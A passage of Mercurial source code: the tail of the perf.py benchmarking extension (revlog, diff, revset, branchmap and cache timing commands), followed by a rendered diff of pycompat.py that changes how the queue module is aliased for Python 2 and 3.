    measure diffs for all changes related to that changeset (manifest
    and filelogs).
    """
    if opts['alldata']:
        opts['changelog'] = True

    if opts.get('changelog') or opts.get('manifest'):
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError('perfunidiff', 'invalid arguments')

    textpairs = []

    r = cmdutil.openrevlog(repo, 'perfunidiff', file_, opts)

    startrev = r.rev(r.lookup(rev))
    for rev in range(startrev, min(startrev + count, len(r) - 1)):
        if opts['alldata']:
            # Load revisions associated with changeset.
            ctx = repo[rev]
            mtext = repo.manifestlog._revlog.revision(ctx.manifestnode())
            for pctx in ctx.parents():
                pman = repo.manifestlog._revlog.revision(pctx.manifestnode())
                textpairs.append((pman, mtext))

            # Load filelog revisions by iterating manifest delta.
            man = ctx.manifest()
            pman = ctx.p1().manifest()
            for filename, change in pman.diff(man).items():
                fctx = repo.file(filename)
                f1 = fctx.revision(change[0][0] or -1)
                f2 = fctx.revision(change[1][0] or -1)
                textpairs.append((f1, f2))
        else:
            dp = r.deltaparent(rev)
            textpairs.append((r.revision(dp), r.revision(rev)))

    def d():
        for left, right in textpairs:
            # The date strings don't matter, so we pass empty strings.
            headerlines, hunks = mdiff.unidiff(
                left, '', right, '', 'left', 'right', binary=False)
            # consume iterators in roughly the way patch.py does
            b'\n'.join(headerlines)
            b''.join(sum((list(hlines) for hrange, hlines in hunks), []))
    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

@command('perfdiffwd', formatteropts)
def perfdiffwd(ui, repo, **opts):
    """Profile diff of working directory changes"""
    timer, fm = gettimer(ui, opts)
    options = {
        'w': 'ignore_all_space',
        'b': 'ignore_space_change',
        'B': 'ignore_blank_lines',
        }

    for diffopt in ('', 'w', 'b', 'B', 'wB'):
        opts = dict((options[c], '1') for c in diffopt)
        def d():
            ui.pushbuffer()
            commands.diff(ui, repo, **opts)
            ui.popbuffer()
        title = 'diffopts: %s' % (diffopt and ('-' + diffopt) or 'none')
        timer(d, title)
    fm.end()

@command('perfrevlogindex', revlogopts + formatteropts,
         '-c|-m|FILE')
def perfrevlogindex(ui, repo, file_=None, **opts):
    """Benchmark operations against a revlog index.

    This tests constructing a revlog instance, reading index data,
    parsing index data, and performing various operations related to
    index data.
    """

    rl = cmdutil.openrevlog(repo, 'perfrevlogindex', file_, opts)

    opener = getattr(rl, 'opener') # trick linter
    indexfile = rl.indexfile
    data = opener.read(indexfile)

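    # The first four bytes of a revlog index encode the format: the low 16
    # bits of this big-endian word are the version and the high 16 bits are
    # flags; for version 1 (historically "RevlogNG"), bit 16 marks an inline
    # revlog whose data is interleaved with the index.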
    header = struct.unpack('>I', data[0:4])[0]
    version = header & 0xFFFF
    if version == 1:
        revlogio = revlog.revlogio()
        inline = header & (1 << 16)
    else:
        raise error.Abort(('unsupported revlog version: %d') % version)

    rllen = len(rl)

    node0 = rl.node(0)
    node25 = rl.node(rllen // 4)
    node50 = rl.node(rllen // 2)
    node75 = rl.node(rllen // 4 * 3)
    node100 = rl.node(rllen - 1)

    allrevs = range(rllen)
    allrevsrev = list(reversed(allrevs))
    allnodes = [rl.node(rev) for rev in range(rllen)]
    allnodesrev = list(reversed(allnodes))

    def constructor():
        revlog.revlog(opener, indexfile)

    def read():
        with opener(indexfile) as fh:
            fh.read()

    def parseindex():
        revlogio.parseindex(data, inline)

    def getentry(revornode):
        index = revlogio.parseindex(data, inline)[0]
        index[revornode]

    def getentries(revs, count=1):
        index = revlogio.parseindex(data, inline)[0]

        for i in range(count):
            for rev in revs:
                index[rev]

    def resolvenode(node):
        nodemap = revlogio.parseindex(data, inline)[1]
        # This only works for the C code.
        if nodemap is None:
            return

        try:
            nodemap[node]
        except error.RevlogError:
            pass

    def resolvenodes(nodes, count=1):
        nodemap = revlogio.parseindex(data, inline)[1]
        if nodemap is None:
            return

        for i in range(count):
            for node in nodes:
                try:
                    nodemap[node]
                except error.RevlogError:
                    pass

    benches = [
        (constructor, 'revlog constructor'),
        (read, 'read'),
        (parseindex, 'create index object'),
        (lambda: getentry(0), 'retrieve index entry for rev 0'),
        (lambda: resolvenode('a' * 20), 'look up missing node'),
        (lambda: resolvenode(node0), 'look up node at rev 0'),
        (lambda: resolvenode(node25), 'look up node at 1/4 len'),
        (lambda: resolvenode(node50), 'look up node at 1/2 len'),
        (lambda: resolvenode(node75), 'look up node at 3/4 len'),
        (lambda: resolvenode(node100), 'look up node at tip'),
        # 2x variation is to measure caching impact.
        (lambda: resolvenodes(allnodes),
         'look up all nodes (forward)'),
        (lambda: resolvenodes(allnodes, 2),
         'look up all nodes 2x (forward)'),
        (lambda: resolvenodes(allnodesrev),
         'look up all nodes (reverse)'),
        (lambda: resolvenodes(allnodesrev, 2),
         'look up all nodes 2x (reverse)'),
        (lambda: getentries(allrevs),
         'retrieve all index entries (forward)'),
        (lambda: getentries(allrevs, 2),
         'retrieve all index entries 2x (forward)'),
        (lambda: getentries(allrevsrev),
         'retrieve all index entries (reverse)'),
        (lambda: getentries(allrevsrev, 2),
         'retrieve all index entries 2x (reverse)'),
    ]

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
    fm.end()

@command('perfrevlogrevisions', revlogopts + formatteropts +
         [('d', 'dist', 100, 'distance between the revisions'),
          ('s', 'startrev', 0, 'revision to start reading at'),
          ('', 'reverse', False, 'read in reverse')],
         '-c|-m|FILE')
def perfrevlogrevisions(ui, repo, file_=None, startrev=0, reverse=False,
                        **opts):
    """Benchmark reading a series of revisions from a revlog.

    By default, we read every ``-d/--dist`` revision from 0 to tip of
    the specified revlog.

    The start revision can be defined via ``-s/--startrev``.
    """
    rl = cmdutil.openrevlog(repo, 'perfrevlogrevisions', file_, opts)
    rllen = getlen(ui)(rl)

    def d():
        rl.clearcaches()

        beginrev = startrev
        endrev = rllen
        dist = opts['dist']

        if reverse:
            beginrev, endrev = endrev, beginrev
            dist = -1 * dist

        for x in xrange(beginrev, endrev, dist):
            # Old revisions don't support passing int.
            n = rl.node(x)
            rl.revision(n)

    timer, fm = gettimer(ui, opts)
    timer(d)
    fm.end()

@command('perfrevlogchunks', revlogopts + formatteropts +
         [('e', 'engines', '', 'compression engines to use'),
          ('s', 'startrev', 0, 'revision to start at')],
         '-c|-m|FILE')
def perfrevlogchunks(ui, repo, file_=None, engines=None, startrev=0, **opts):
    """Benchmark operations on revlog chunks.

    Logically, each revlog is a collection of fulltext revisions. However,
    stored within each revlog are "chunks" of possibly compressed data. This
    data needs to be read and decompressed or compressed and written.

    This command measures the time it takes to read+decompress and recompress
    chunks in a revlog. It effectively isolates I/O and compression
    performance. For measurements of higher-level operations like resolving
    revisions, see ``perfrevlogrevisions`` and ``perfrevlogrevision``.
    """
    rl = cmdutil.openrevlog(repo, 'perfrevlogchunks', file_, opts)

    # _chunkraw was renamed to _getsegmentforrevs.
    try:
        segmentforrevs = rl._getsegmentforrevs
    except AttributeError:
        segmentforrevs = rl._chunkraw

    # Verify engines argument.
    if engines:
        engines = set(e.strip() for e in engines.split(','))
        for engine in engines:
            try:
                util.compressionengines[engine]
            except KeyError:
                raise error.Abort('unknown compression engine: %s' % engine)
    else:
        engines = []
        for e in util.compengines:
            engine = util.compengines[e]
            try:
                if engine.available():
                    engine.revlogcompressor().compress('dummy')
                    engines.append(e)
            except NotImplementedError:
                pass

    revs = list(rl.revs(startrev, len(rl) - 1))

    def rlfh(rl):
        if rl._inline:
            return getsvfs(repo)(rl.indexfile)
        else:
            return getsvfs(repo)(rl.datafile)

    def doread():
        rl.clearcaches()
        for rev in revs:
            segmentforrevs(rev, rev)

    def doreadcachedfh():
        rl.clearcaches()
        fh = rlfh(rl)
        for rev in revs:
            segmentforrevs(rev, rev, df=fh)

    def doreadbatch():
        rl.clearcaches()
        segmentforrevs(revs[0], revs[-1])

    def doreadbatchcachedfh():
        rl.clearcaches()
        fh = rlfh(rl)
        segmentforrevs(revs[0], revs[-1], df=fh)

    def dochunk():
        rl.clearcaches()
        fh = rlfh(rl)
        for rev in revs:
            rl._chunk(rev, df=fh)

    chunks = [None]

    def dochunkbatch():
        rl.clearcaches()
        fh = rlfh(rl)
        # Save chunks as a side-effect.
        chunks[0] = rl._chunks(revs, df=fh)

    def docompress(compressor):
        rl.clearcaches()

        try:
            # Swap in the requested compression engine.
            oldcompressor = rl._compressor
            rl._compressor = compressor
            for chunk in chunks[0]:
                rl.compress(chunk)
        finally:
            rl._compressor = oldcompressor

    benches = [
        (lambda: doread(), 'read'),
        (lambda: doreadcachedfh(), 'read w/ reused fd'),
        (lambda: doreadbatch(), 'read batch'),
        (lambda: doreadbatchcachedfh(), 'read batch w/ reused fd'),
        (lambda: dochunk(), 'chunk'),
        (lambda: dochunkbatch(), 'chunk batch'),
    ]

    for engine in sorted(engines):
        compressor = util.compengines[engine].revlogcompressor()
        benches.append((functools.partial(docompress, compressor),
                        'compress w/ %s' % engine))

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
    fm.end()
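
# Editor's note: an illustrative invocation (engine availability depends on
# how Mercurial was built):
#
#     $ hg perfrevlogchunks -c --engines 'zlib,zstd' --startrev 10000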

@command('perfrevlogrevision', revlogopts + formatteropts +
         [('', 'cache', False, 'use caches instead of clearing')],
         '-c|-m|FILE REV')
def perfrevlogrevision(ui, repo, file_, rev=None, cache=None, **opts):
    """Benchmark obtaining a revlog revision.

    Obtaining a revlog revision consists of roughly the following steps:

    1. Compute the delta chain
    2. Obtain the raw chunks for that delta chain
    3. Decompress each raw chunk
    4. Apply binary patches to obtain fulltext
    5. Verify hash of fulltext

    This command measures the time spent in each of these phases.
    """
    if opts.get('changelog') or opts.get('manifest'):
        file_, rev = None, file_
    elif rev is None:
        raise error.CommandError('perfrevlogrevision', 'invalid arguments')

    r = cmdutil.openrevlog(repo, 'perfrevlogrevision', file_, opts)

    # _chunkraw was renamed to _getsegmentforrevs.
    try:
        segmentforrevs = r._getsegmentforrevs
    except AttributeError:
        segmentforrevs = r._chunkraw

    node = r.lookup(rev)
    rev = r.rev(node)

    def getrawchunks(data, chain):
        start = r.start
        length = r.length
        inline = r._inline
        iosize = r._io.size
        buffer = util.buffer
        offset = start(chain[0])

        chunks = []
        ladd = chunks.append

        for rev in chain:
            chunkstart = start(rev)
            if inline:
                # An inline revlog interleaves an index entry with each
                # chunk, so skip the (rev + 1) index records that precede
                # this chunk's data.
                chunkstart += (rev + 1) * iosize
            chunklength = length(rev)
            ladd(buffer(data, chunkstart - offset, chunklength))

        return chunks

    def dodeltachain(rev):
        if not cache:
            r.clearcaches()
        r._deltachain(rev)

    def doread(chain):
        if not cache:
            r.clearcaches()
        segmentforrevs(chain[0], chain[-1])

    def dorawchunks(data, chain):
        if not cache:
            r.clearcaches()
        getrawchunks(data, chain)

    def dodecompress(chunks):
        decomp = r.decompress
        for chunk in chunks:
            decomp(chunk)

    def dopatch(text, bins):
        if not cache:
            r.clearcaches()
        mdiff.patches(text, bins)

    def dohash(text):
        if not cache:
            r.clearcaches()
        r.checkhash(text, node, rev=rev)

    def dorevision():
        if not cache:
            r.clearcaches()
        r.revision(node)

    chain = r._deltachain(rev)[0]
    data = segmentforrevs(chain[0], chain[-1])[1]
    rawchunks = getrawchunks(data, chain)
    bins = r._chunks(chain)
    text = str(bins[0])
    bins = bins[1:]
    text = mdiff.patches(text, bins)

    benches = [
        (lambda: dorevision(), 'full'),
        (lambda: dodeltachain(rev), 'deltachain'),
        (lambda: doread(chain), 'read'),
        (lambda: dorawchunks(data, chain), 'rawchunks'),
        (lambda: dodecompress(rawchunks), 'decompress'),
        (lambda: dopatch(text, bins), 'patch'),
        (lambda: dohash(text), 'hash'),
    ]

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
    fm.end()
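
# Editor's note: the bench titles correspond to the numbered steps in the
# docstring above: 'deltachain' is step 1, 'read' and 'rawchunks' cover
# step 2, 'decompress' is step 3, 'patch' is step 4, 'hash' is step 5, and
# 'full' exercises the whole pipeline via r.revision(). An illustrative run:
#
#     $ hg perfrevlogrevision -m 5000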

@command('perfrevset',
         [('C', 'clear', False, 'clear volatile cache between each call.'),
          ('', 'contexts', False, 'obtain changectx for each revision')]
         + formatteropts, "REVSET")
def perfrevset(ui, repo, expr, clear=False, contexts=False, **opts):
    """benchmark the execution time of a revset

    Use the --clear option if you need to evaluate the impact of building
    the volatile revision set caches on revset execution. The volatile
    caches hold filtered and obsolescence-related data."""
    timer, fm = gettimer(ui, opts)
    def d():
        if clear:
            repo.invalidatevolatilesets()
        if contexts:
            for ctx in repo.set(expr):
                pass
        else:
            for r in repo.revs(expr):
                pass
    timer(d)
    fm.end()
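
# Editor's note: illustrative invocations (any revset expression works here):
#
#     $ hg perfrevset 'all()'
#     $ hg perfrevset 'draft()' --contexts -C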

@command('perfvolatilesets',
         [('', 'clear-obsstore', False, 'drop obsstore between each call.'),
          ] + formatteropts)
def perfvolatilesets(ui, repo, *names, **opts):
    """benchmark the computation of various volatile sets

    Volatile sets compute elements related to filtering and obsolescence."""
    timer, fm = gettimer(ui, opts)
    repo = repo.unfiltered()

    def getobs(name):
        def d():
            repo.invalidatevolatilesets()
            if opts['clear_obsstore']:
                clearfilecache(repo, 'obsstore')
            obsolete.getrevs(repo, name)
        return d

    allobs = sorted(obsolete.cachefuncs)
    if names:
        allobs = [n for n in allobs if n in names]

    for name in allobs:
        timer(getobs(name), title=name)

    def getfiltered(name):
        def d():
            repo.invalidatevolatilesets()
            if opts['clear_obsstore']:
                clearfilecache(repo, 'obsstore')
            repoview.filterrevs(repo, name)
        return d

    allfilter = sorted(repoview.filtertable)
    if names:
        allfilter = [n for n in allfilter if n in names]

    for name in allfilter:
        timer(getfiltered(name), title=name)
    fm.end()

@command('perfbranchmap',
         [('f', 'full', False,
           'include the build time of subsets'),
          ('', 'clear-revbranch', False,
           'purge the revbranch cache between computations'),
          ] + formatteropts)
def perfbranchmap(ui, repo, *filternames, **opts):
    """benchmark the update of a branchmap

    This benchmarks the full repo.branchmap() call with read and write
    disabled.
    """
    full = opts.get("full", False)
    clear_revbranch = opts.get("clear_revbranch", False)
    timer, fm = gettimer(ui, opts)
    def getbranchmap(filtername):
        """generate a benchmark function for the filtername"""
        if filtername is None:
            view = repo
        else:
            view = repo.filtered(filtername)
        def d():
            if clear_revbranch:
                repo.revbranchcache()._clear()
            if full:
                view._branchcaches.clear()
            else:
                view._branchcaches.pop(filtername, None)
            view.branchmap()
        return d
    # add filter in smaller subset to bigger subset
    possiblefilters = set(repoview.filtertable)
    if filternames:
        possiblefilters &= set(filternames)
    subsettable = getbranchmapsubsettable()
    allfilters = []
    while possiblefilters:
        # pick a filter whose subset is no longer pending, so that smaller
        # subsets are always benchmarked (and their caches warmed) first
        for name in possiblefilters:
            subset = subsettable.get(name)
            if subset not in possiblefilters:
                break
        else:
            assert False, 'subset cycle %s!' % possiblefilters
        allfilters.append(name)
        possiblefilters.remove(name)

    # warm the cache
    if not full:
        for name in allfilters:
            repo.filtered(name).branchmap()
    if not filternames or 'unfiltered' in filternames:
        # add unfiltered
        allfilters.append(None)

    branchcacheread = safeattrsetter(branchmap, 'read')
    branchcachewrite = safeattrsetter(branchmap.branchcache, 'write')
    branchcacheread.set(lambda repo: None)
    branchcachewrite.set(lambda bc, repo: None)
    try:
        for name in allfilters:
            printname = name
            if name is None:
                printname = 'unfiltered'
            timer(getbranchmap(name), title=str(printname))
    finally:
        branchcacheread.restore()
        branchcachewrite.restore()
    fm.end()

@command('perfloadmarkers')
def perfloadmarkers(ui, repo):
    """benchmark the time to parse the on-disk markers for a repo

    Result is the number of markers in the repo."""
    timer, fm = gettimer(ui)
    svfs = getsvfs(repo)
    timer(lambda: len(obsolete.obsstore(svfs)))
    fm.end()

@command('perflrucachedict', formatteropts +
         [('', 'size', 4, 'size of cache'),
          ('', 'gets', 10000, 'number of key lookups'),
          ('', 'sets', 10000, 'number of key sets'),
          ('', 'mixed', 10000, 'number of mixed mode operations'),
          ('', 'mixedgetfreq', 50, 'frequency of get vs set ops in mixed mode')],
         norepo=True)
def perflrucache(ui, size=4, gets=10000, sets=10000, mixed=10000,
                 mixedgetfreq=50, **opts):
    def doinit():
        for i in xrange(10000):
            util.lrucachedict(size)

    values = []
    for i in xrange(size):
        values.append(random.randint(0, sys.maxint))

    # Get mode fills the cache and tests raw lookup performance with no
    # eviction.
    getseq = []
    for i in xrange(gets):
        getseq.append(random.choice(values))

    def dogets():
        d = util.lrucachedict(size)
        for v in values:
            d[v] = v
        for key in getseq:
            value = d[key]
            value # silence pyflakes warning

    # Set mode tests insertion speed with cache eviction.
    setseq = []
    for i in xrange(sets):
        setseq.append(random.randint(0, sys.maxint))

    def dosets():
        d = util.lrucachedict(size)
        for v in setseq:
            d[v] = v

    # Mixed mode randomly performs gets and sets with eviction.
    mixedops = []
    for i in xrange(mixed):
        r = random.randint(0, 100)
        if r < mixedgetfreq:
            op = 0
        else:
            op = 1

        mixedops.append((op, random.randint(0, size * 2)))

    def domixed():
        d = util.lrucachedict(size)

        for op, v in mixedops:
            if op == 0:
                try:
                    d[v]
                except KeyError:
                    pass
            else:
                d[v] = v

    benches = [
        (doinit, 'init'),
        (dogets, 'gets'),
        (dosets, 'sets'),
        (domixed, 'mixed')
    ]

    for fn, title in benches:
        timer, fm = gettimer(ui, opts)
        timer(fn, title=title)
    fm.end()

@command('perfwrite', formatteropts)
def perfwrite(ui, repo, **opts):
    """microbenchmark ui.write
    """
    timer, fm = gettimer(ui, opts)
    def write():
        for i in range(100000):
            ui.write(('Testing write performance\n'))
    timer(write)
    fm.end()

def uisetup(ui):
    if (util.safehasattr(cmdutil, 'openrevlog') and
        not util.safehasattr(commands, 'debugrevlogopts')):
        # for "historical portability":
        # In this case, Mercurial should be 1.9 (or a79fea6b3e77) -
        # 3.7 (or 5606f7d0d063). Therefore, '--dir' option for
        # openrevlog() should cause failure, because it has been
        # available since 3.5 (or 49c583ca48c4).
        def openrevlog(orig, repo, cmd, file_, opts):
            if opts.get('dir') and not util.safehasattr(repo, 'dirlog'):
                raise error.Abort("This version doesn't support --dir option",
                                  hint="use 3.5 or later")
            return orig(repo, cmd, file_, opts)
        extensions.wrapfunction(cmdutil, 'openrevlog', openrevlog)

@@ -1,389 +1,386 @@
# pycompat.py - portability shim for python 3
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

"""Mercurial portability shim for python 3.

This contains aliases to hide python version-specific details from the core.
"""

from __future__ import absolute_import

import getopt
import inspect
import os
import shlex
import sys

ispy3 = (sys.version_info[0] >= 3)
ispypy = (r'__pypy__' in sys.builtin_module_names)

if not ispy3:
    import cookielib
    import cPickle as pickle
    import httplib
-    import Queue as _queue
+    import Queue as queue
    import SocketServer as socketserver
    import xmlrpclib

    from .thirdparty.concurrent import futures

    def future_set_exception_info(f, exc_info):
        f.set_exception_info(*exc_info)
else:
    import concurrent.futures as futures
    import http.cookiejar as cookielib
    import http.client as httplib
    import pickle
-    import queue as _queue
+    import queue as queue
    import socketserver
    import xmlrpc.client as xmlrpclib

    def future_set_exception_info(f, exc_info):
        f.set_exception(exc_info[0])
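    # Editor's note: the two variants above differ because the Python 2
    # futures backport can keep the traceback via set_exception_info(),
    # while on Python 3 the exception object itself carries __traceback__,
    # so set_exception() suffices.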

-empty = _queue.Empty
-queue = _queue.Queue
-
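# Editor's note on the API change above: `queue` is now the re-exported
# stdlib module rather than an alias for the Queue class, and the
# module-level `empty` symbol is gone. A sketch of how callers migrate:
#
#     from mercurial import pycompat
#
#     q = pycompat.queue.Queue()       # was: pycompat.queue()
#     try:
#         q.get(block=False)
#     except pycompat.queue.Empty:     # was: pycompat.empty
#         pass
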
def identity(a):
    return a

if ispy3:
    import builtins
    import functools
    import io
    import struct

    fsencode = os.fsencode
    fsdecode = os.fsdecode
    oscurdir = os.curdir.encode('ascii')
    oslinesep = os.linesep.encode('ascii')
    osname = os.name.encode('ascii')
    ospathsep = os.pathsep.encode('ascii')
    ospardir = os.pardir.encode('ascii')
    ossep = os.sep.encode('ascii')
    osaltsep = os.altsep
    if osaltsep:
        osaltsep = osaltsep.encode('ascii')
    # os.getcwd() on Python 3 returns string, but it has os.getcwdb() which
    # returns bytes.
    getcwd = os.getcwdb
    sysplatform = sys.platform.encode('ascii')
    sysexecutable = sys.executable
    if sysexecutable:
        sysexecutable = os.fsencode(sysexecutable)
    bytesio = io.BytesIO
    # TODO deprecate stringio name, as it is a lie on Python 3.
    stringio = bytesio

    def maplist(*args):
        return list(map(*args))

    def rangelist(*args):
        return list(range(*args))

    def ziplist(*args):
        return list(zip(*args))

    rawinput = input
    getargspec = inspect.getfullargspec

    # TODO: .buffer might not exist if std streams were replaced; we'll need
    # a silly wrapper to make a bytes stream backed by a unicode one.
    stdin = sys.stdin.buffer
    stdout = sys.stdout.buffer
    stderr = sys.stderr.buffer

    # Since Python 3 converts argv to wchar_t type by Py_DecodeLocale() on
    # Unix, we can use os.fsencode() to get back bytes argv.
    #
    # https://hg.python.org/cpython/file/v3.5.1/Programs/python.c#l55
    #
    # TODO: On Windows, the native argv is wchar_t, so we'll need a different
    # workaround to simulate the Python 2 (i.e. ANSI Win32 API) behavior.
    if getattr(sys, 'argv', None) is not None:
        sysargv = list(map(os.fsencode, sys.argv))

    bytechr = struct.Struct('>B').pack
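    # Editor's note: bytechr() gives Python 2 chr() semantics on Python 3,
    # packing an int in [0, 255] into a single byte, e.g. bytechr(65) == b'A'.
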
109 byterepr = b'%r'.__mod__
106 byterepr = b'%r'.__mod__
110
107
111 class bytestr(bytes):
108 class bytestr(bytes):
112 """A bytes which mostly acts as a Python 2 str
109 """A bytes which mostly acts as a Python 2 str
113
110
114 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
111 >>> bytestr(), bytestr(bytearray(b'foo')), bytestr(u'ascii'), bytestr(1)
115 ('', 'foo', 'ascii', '1')
112 ('', 'foo', 'ascii', '1')
116 >>> s = bytestr(b'foo')
113 >>> s = bytestr(b'foo')
117 >>> assert s is bytestr(s)
114 >>> assert s is bytestr(s)
118
115
119 __bytes__() should be called if provided:
116 __bytes__() should be called if provided:
120
117
121 >>> class bytesable(object):
118 >>> class bytesable(object):
122 ... def __bytes__(self):
119 ... def __bytes__(self):
123 ... return b'bytes'
120 ... return b'bytes'
124 >>> bytestr(bytesable())
121 >>> bytestr(bytesable())
125 'bytes'
122 'bytes'
126
123
127 There's no implicit conversion from non-ascii str as its encoding is
124 There's no implicit conversion from non-ascii str as its encoding is
128 unknown:
125 unknown:
129
126
130 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
127 >>> bytestr(chr(0x80)) # doctest: +ELLIPSIS
131 Traceback (most recent call last):
128 Traceback (most recent call last):
132 ...
129 ...
133 UnicodeEncodeError: ...
130 UnicodeEncodeError: ...
134
131
135 Comparison between bytestr and bytes should work:
132 Comparison between bytestr and bytes should work:
136
133
137 >>> assert bytestr(b'foo') == b'foo'
134 >>> assert bytestr(b'foo') == b'foo'
138 >>> assert b'foo' == bytestr(b'foo')
135 >>> assert b'foo' == bytestr(b'foo')
139 >>> assert b'f' in bytestr(b'foo')
136 >>> assert b'f' in bytestr(b'foo')
140 >>> assert bytestr(b'f') in b'foo'
137 >>> assert bytestr(b'f') in b'foo'
141
138
142 Sliced elements should be bytes, not integer:
139 Sliced elements should be bytes, not integer:
143
140
144 >>> s[1], s[:2]
141 >>> s[1], s[:2]
145 (b'o', b'fo')
142 (b'o', b'fo')
146 >>> list(s), list(reversed(s))
143 >>> list(s), list(reversed(s))
147 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
144 ([b'f', b'o', b'o'], [b'o', b'o', b'f'])
148
145
149 As bytestr type isn't propagated across operations, you need to cast
146 As bytestr type isn't propagated across operations, you need to cast
150 bytes to bytestr explicitly:
147 bytes to bytestr explicitly:
151
148
152 >>> s = bytestr(b'foo').upper()
149 >>> s = bytestr(b'foo').upper()
153 >>> t = bytestr(s)
150 >>> t = bytestr(s)
154 >>> s[0], t[0]
151 >>> s[0], t[0]
155 (70, b'F')
152 (70, b'F')
156
153
157 Be careful to not pass a bytestr object to a function which expects
154 Be careful to not pass a bytestr object to a function which expects
158 bytearray-like behavior.
155 bytearray-like behavior.
159
156
160 >>> t = bytes(t) # cast to bytes
157 >>> t = bytes(t) # cast to bytes
161 >>> assert type(t) is bytes
158 >>> assert type(t) is bytes
162 """
159 """
163
160
164 def __new__(cls, s=b''):
161 def __new__(cls, s=b''):
165 if isinstance(s, bytestr):
162 if isinstance(s, bytestr):
166 return s
163 return s
167 if (not isinstance(s, (bytes, bytearray))
164 if (not isinstance(s, (bytes, bytearray))
168 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
165 and not hasattr(s, u'__bytes__')): # hasattr-py3-only
169 s = str(s).encode(u'ascii')
166 s = str(s).encode(u'ascii')
170 return bytes.__new__(cls, s)
167 return bytes.__new__(cls, s)
171
168
172 def __getitem__(self, key):
169 def __getitem__(self, key):
173 s = bytes.__getitem__(self, key)
170 s = bytes.__getitem__(self, key)
174 if not isinstance(s, bytes):
171 if not isinstance(s, bytes):
175 s = bytechr(s)
172 s = bytechr(s)
176 return s
173 return s
177
174
178 def __iter__(self):
175 def __iter__(self):
179 return iterbytestr(bytes.__iter__(self))
176 return iterbytestr(bytes.__iter__(self))
180
177
181 def __repr__(self):
178 def __repr__(self):
182 return bytes.__repr__(self)[1:] # drop b''
179 return bytes.__repr__(self)[1:] # drop b''
183
180
184 def iterbytestr(s):
181 def iterbytestr(s):
185 """Iterate bytes as if it were a str object of Python 2"""
182 """Iterate bytes as if it were a str object of Python 2"""
186 return map(bytechr, s)
183 return map(bytechr, s)
187
184
188 def maybebytestr(s):
185 def maybebytestr(s):
189 """Promote bytes to bytestr"""
186 """Promote bytes to bytestr"""
190 if isinstance(s, bytes):
187 if isinstance(s, bytes):
191 return bytestr(s)
188 return bytestr(s)
192 return s
189 return s
193
190
194 def sysbytes(s):
191 def sysbytes(s):
195 """Convert an internal str (e.g. keyword, __doc__) back to bytes
192 """Convert an internal str (e.g. keyword, __doc__) back to bytes
196
193
197 This never raises UnicodeEncodeError, but only ASCII characters
194 This never raises UnicodeEncodeError, but only ASCII characters
198 can be round-tripped by sysstr(sysbytes(s)).
195 can be round-tripped by sysstr(sysbytes(s)).
199 """
196 """
200 return s.encode(u'utf-8')
197 return s.encode(u'utf-8')
201
198
202 def sysstr(s):
199 def sysstr(s):
203 """Return a keyword str to be passed to Python functions such as
200 """Return a keyword str to be passed to Python functions such as
204 getattr() and str.encode()
201 getattr() and str.encode()
205
202
206 This never raises UnicodeDecodeError. Non-ascii characters are
203 This never raises UnicodeDecodeError. Non-ascii characters are
207 considered invalid and mapped to arbitrary but unique code points
204 considered invalid and mapped to arbitrary but unique code points
208 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
205 such that 'sysstr(a) != sysstr(b)' for all 'a != b'.
209 """
206 """
210 if isinstance(s, builtins.str):
207 if isinstance(s, builtins.str):
211 return s
208 return s
212 return s.decode(u'latin-1')
209 return s.decode(u'latin-1')
213
210
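A quick sketch of how these two helpers compose on Python 3 (values illustrative, not from the source): ASCII text survives the sysstr(sysbytes(...)) round trip, while non-ASCII text does not, since sysbytes() encodes UTF-8 but sysstr() decodes latin-1.

assert sysstr(b'changeset') == 'changeset'       # bytes -> str, never raises
assert sysbytes(u'changeset') == b'changeset'    # str -> bytes, UTF-8
# Non-ASCII is mangled deterministically rather than raising:
assert sysstr(sysbytes(u'caf\xe9')) != u'caf\xe9'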
214 def strurl(url):
211 def strurl(url):
215 """Converts a bytes url back to str"""
212 """Converts a bytes url back to str"""
216 if isinstance(url, bytes):
213 if isinstance(url, bytes):
217 return url.decode(u'ascii')
214 return url.decode(u'ascii')
218 return url
215 return url
219
216
220 def bytesurl(url):
217 def bytesurl(url):
221 """Converts a str url to bytes by encoding in ascii"""
218 """Converts a str url to bytes by encoding in ascii"""
222 if isinstance(url, str):
219 if isinstance(url, str):
223 return url.encode(u'ascii')
220 return url.encode(u'ascii')
224 return url
221 return url
225
222
226 def raisewithtb(exc, tb):
223 def raisewithtb(exc, tb):
227 """Raise exception with the given traceback"""
224 """Raise exception with the given traceback"""
228 raise exc.with_traceback(tb)
225 raise exc.with_traceback(tb)
229
226
230 def getdoc(obj):
227 def getdoc(obj):
231 """Get docstring as bytes; may be None so gettext() won't confuse it
228 """Get docstring as bytes; may be None so gettext() won't confuse it
232 with _('')"""
229 with _('')"""
233 doc = getattr(obj, u'__doc__', None)
230 doc = getattr(obj, u'__doc__', None)
234 if doc is None:
231 if doc is None:
235 return doc
232 return doc
236 return sysbytes(doc)
233 return sysbytes(doc)
237
234
238 def _wrapattrfunc(f):
235 def _wrapattrfunc(f):
239 @functools.wraps(f)
236 @functools.wraps(f)
240 def w(object, name, *args):
237 def w(object, name, *args):
241 return f(object, sysstr(name), *args)
238 return f(object, sysstr(name), *args)
242 return w
239 return w
243
240
244 # these wrappers are automagically imported by hgloader
241 # these wrappers are automagically imported by hgloader
245 delattr = _wrapattrfunc(builtins.delattr)
242 delattr = _wrapattrfunc(builtins.delattr)
246 getattr = _wrapattrfunc(builtins.getattr)
243 getattr = _wrapattrfunc(builtins.getattr)
247 hasattr = _wrapattrfunc(builtins.hasattr)
244 hasattr = _wrapattrfunc(builtins.hasattr)
248 setattr = _wrapattrfunc(builtins.setattr)
245 setattr = _wrapattrfunc(builtins.setattr)
249 xrange = builtins.range
246 xrange = builtins.range
250 unicode = str
247 unicode = str
251
248
252 def open(name, mode='r', buffering=-1, encoding=None):
249 def open(name, mode='r', buffering=-1, encoding=None):
253 return builtins.open(name, sysstr(mode), buffering, encoding)
250 return builtins.open(name, sysstr(mode), buffering, encoding)
254
251
